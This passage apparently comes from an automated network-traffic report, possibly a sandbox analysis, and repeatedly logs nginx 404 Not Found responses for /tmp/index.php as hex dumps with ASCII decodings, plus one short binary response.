69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 04 Oct 2024 17:17:45 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 04 Oct 2024 17:17:47 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 04 Oct 2024 17:17:48 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 04 Oct 2024 17:17:50 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 04 Oct 2024 17:17:52 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 04 Oct 2024 17:17:55 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 04 Oct 2024 17:17:57 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 04 Oct 2024 17:17:59 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 04 Oct 2024 17:18:01 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 04 Oct 2024 17:18:02 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 04 Oct 2024 17:18:03 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 59 39 08 a5 6c 5f b5 ac 17 bd cf b4 fe 6d 9f 3d d4 a1 72 0a 41 c2 8f 97 cb Data Ascii: #\6Y9l_m=rA
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 04 Oct 2024 17:18:06 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 04 Oct 2024 17:18:07 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 04 Oct 2024 17:18:09 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 04 Oct 2024 17:18:10 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 